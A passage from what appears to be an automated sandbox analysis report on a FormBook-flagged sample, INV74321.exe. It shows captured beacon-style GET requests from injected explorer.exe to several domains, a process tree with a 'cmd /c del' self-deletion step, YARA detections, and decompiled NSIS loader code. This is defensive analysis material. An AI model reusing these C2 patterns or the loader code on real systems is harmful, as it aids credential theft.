                                                        Date: Wed, 12 May 2021 05:36:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: close
                                                        Location: https://topcasino-111.org/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.4</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.349737154.84.101.24780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:53.337873936 CEST6070OUTGET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1
                                                        Host: www.shebagholdings.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:54.001211882 CEST6070INHTTP/1.1 404 Not Found
                                                        Transfer-Encoding: chunked
                                                        Server: IIS Microsoft-HTTPAPI/2.0
                                                        X-Powered-By: IIS
                                                        Date: Wed, 12 May 2021 05:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.34973864.190.62.11180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:58.988852024 CEST6071OUTGET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.booweats.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:59.068284035 CEST6072INHTTP/1.1 302 Found
                                                        date: Wed, 12 May 2021 05:36:59 GMT
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 0
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0IkIReecyedsKP0Z3ZUlN8WfOeeXlS8fzoYUbPSm0tTmZySD2nnP3pCqIeh4W5JzjK4yuWca9nv5u9W/WSUVrA==
                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        pragma: no-cache
                                                        last-modified: Wed, 12 May 2021 05:36:59 GMT
                                                        location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                        x-cache-miss-from: parking-5cc4cbb56f-gdph7
                                                        server: NginX
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:37:04.217828035 CEST6090OUTGET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1
                                                        Host: www.xn--espacesacr-k7a.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:37:04.354921103 CEST6091INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Wed, 12 May 2021 05:37:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "609953af-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: INV74321.exe PID: 5520 Parent PID: 5652

                                                        General

                                                        Start time:07:35:08
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: INV74321.exe PID: 4604 Parent PID: 5520

                                                        General

                                                        Start time:07:35:09
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 4604

                                                        General

                                                        Start time:07:35:15
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff714890000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: wlanext.exe PID: 6292 Parent PID: 3388

                                                        General

                                                        Start time:07:35:29
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                        Imagebase:0xd90000
                                                        File size:78848 bytes
                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 6480 Parent PID: 6292

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x1f0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6488 Parent PID: 6480

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: INV74321.exe PID: 5520 Parent PID: 5652 INV74321.exeCOMMON

                                                          Executed Functions

                                                          Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 86%
                                                          			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t119 = E00406500(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406492(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060F7("accumulate Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\hardz\\Desktop\\INV74321.exe\" ";
				E004060F7(_t160, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\hardz\\Desktop\\INV74321.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403317(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403830();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t63 =  *0x42f4ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406500(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t153 = E00405ABA(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040577E(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\hardz\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
														}
														E004060F7(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\INV74321.exe", 0x429450, 1) != 0) {
																E00405ED6(_t137, 0x429450, 0);
																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t94 = E00405796(0x429450);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405ED6(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B7D(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403317(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403317(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                          0x00403358
                                                          0x0040335c
                                                          0x00403364
                                                          0x00403368
                                                          0x0040336d
                                                          0x00403379
                                                          0x00403382
                                                          0x00403387
                                                          0x0040338a
                                                          0x00403391
                                                          0x00403398
                                                          0x00403398
                                                          0x00403391
                                                          0x0040339a
                                                          0x0040339f
                                                          0x004033a0
                                                          0x004033ac
                                                          0x004033b0
                                                          0x004033b6
                                                          0x004033c4
                                                          0x004033c9
                                                          0x004033d0
                                                          0x004033d4
                                                          0x004033d8
                                                          0x004033da
                                                          0x004033da
                                                          0x004033d8
                                                          0x004033e2
                                                          0x004033e9
                                                          0x004033ef
                                                          0x00403405
                                                          0x00403415
                                                          0x0040341a
                                                          0x00403420
                                                          0x00403427
                                                          0x00403433
                                                          0x0040343d
                                                          0x0040343f
                                                          0x00403441
                                                          0x00403446
                                                          0x00403446
                                                          0x00403456
                                                          0x0040345c
                                                          0x00403525
                                                          0x00403525
                                                          0x00403527
                                                          0x00403529
                                                          0x00000000
                                                          0x00000000
                                                          0x00403465
                                                          0x00403468
                                                          0x00403470
                                                          0x00403470
                                                          0x00403473
                                                          0x00403478
                                                          0x0040347a
                                                          0x0040347a
                                                          0x0040347b
                                                          0x0040347b
                                                          0x00403480
                                                          0x00403483
                                                          0x00403515
                                                          0x0040351a
                                                          0x0040351f
                                                          0x00403522
                                                          0x00403524
                                                          0x00403524
                                                          0x00403524
                                                          0x00000000
                                                          0x00403489
                                                          0x00403489
                                                          0x0040348a
                                                          0x0040348d
                                                          0x004034a5
                                                          0x004034d0
                                                          0x004034d2
                                                          0x004034e5
                                                          0x00403510
                                                          0x00403513
                                                          0x00403531
                                                          0x00403534
                                                          0x0040353d
                                                          0x00403542
                                                          0x00403548
                                                          0x00403553
                                                          0x00403555
                                                          0x0040355a
                                                          0x0040355c
                                                          0x004035b4
                                                          0x004035b9
                                                          0x004035c3
                                                          0x004035ca
                                                          0x004035ce
                                                          0x00403662
                                                          0x00403662
                                                          0x00403667
                                                          0x0040366d
                                                          0x00403672
                                                          0x00403796
                                                          0x0040379c
                                                          0x00403818
                                                          0x00403818
                                                          0x0040381d
                                                          0x00403820
                                                          0x00403822
                                                          0x00403822
                                                          0x0040382a
                                                          0x0040382a
                                                          0x004037ac
                                                          0x004037b4
                                                          0x004037b6
                                                          0x004037b7
                                                          0x004037c4
                                                          0x004037d7
                                                          0x004037df
                                                          0x004037e3
                                                          0x004037e3
                                                          0x004037eb
                                                          0x004037f0
                                                          0x004037f7
                                                          0x00403805
                                                          0x00403807
                                                          0x0040380d
                                                          0x0040380f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004037f9
                                                          0x004037ff
                                                          0x00403801
                                                          0x00403803
                                                          0x00403811
                                                          0x00403813
                                                          0x00000000
                                                          0x00403813
                                                          0x00000000
                                                          0x00403803
                                                          0x004037f7
                                                          0x00403681
                                                          0x00403688
                                                          0x00403688
                                                          0x004035da
                                                          0x00403652
                                                          0x00403652
                                                          0x0040365e
                                                          0x00000000
                                                          0x0040365e
                                                          0x004035e3
                                                          0x004035e7
                                                          0x0040361d
                                                          0x0040361d
                                                          0x0040361f
                                                          0x00403627
                                                          0x00403699
                                                          0x0040369b
                                                          0x004036a2
                                                          0x004036aa
                                                          0x004036aa
                                                          0x004036b5
                                                          0x004036ba
                                                          0x004036c9
                                                          0x004036cd
                                                          0x004036ce
                                                          0x004036d7
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036d0
                                                          0x004036dd
                                                          0x004036e3
                                                          0x004036e9
                                                          0x004036f1
                                                          0x004036f1
                                                          0x004036ff
                                                          0x00403704
                                                          0x00403716
                                                          0x0040371e
                                                          0x00403724
                                                          0x00403730
                                                          0x00403736
                                                          0x00403740
                                                          0x00403756
                                                          0x00403767
                                                          0x0040376d
                                                          0x00403774
                                                          0x00403777
                                                          0x0040377d
                                                          0x0040377d
                                                          0x00403774
                                                          0x00403781
                                                          0x00403787
                                                          0x00403787
                                                          0x0040378c
                                                          0x0040378c
                                                          0x00000000
                                                          0x004036c9
                                                          0x00403629
                                                          0x0040362b
                                                          0x00403636
                                                          0x00000000
                                                          0x00000000
                                                          0x0040363e
                                                          0x00403649
                                                          0x0040364e
                                                          0x00000000
                                                          0x0040364e
                                                          0x00403612
                                                          0x00403614
                                                          0x00403618
                                                          0x0040361b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040361b
                                                          0x00000000
                                                          0x00403614
                                                          0x00403564
                                                          0x00403570
                                                          0x00403575
                                                          0x0040357a
                                                          0x0040357c
                                                          0x00000000
                                                          0x00000000
                                                          0x00403584
                                                          0x0040358c
                                                          0x0040359d
                                                          0x004035a5
                                                          0x004035a7
                                                          0x004035ac
                                                          0x004035ae
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035ae
                                                          0x00000000
                                                          0x00403513
                                                          0x004034d4
                                                          0x004034d7
                                                          0x004034da
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x004034e0
                                                          0x00000000
                                                          0x004034e0
                                                          0x004034dc
                                                          0x004034de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004034de
                                                          0x0040348f
                                                          0x00403492
                                                          0x00403495
                                                          0x0040349b
                                                          0x0040349b
                                                          0x00000000
                                                          0x0040349b
                                                          0x00403497
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403499
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346a
                                                          0x0040346b
                                                          0x0040346b
                                                          0x00000000
                                                          0x0040346a
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
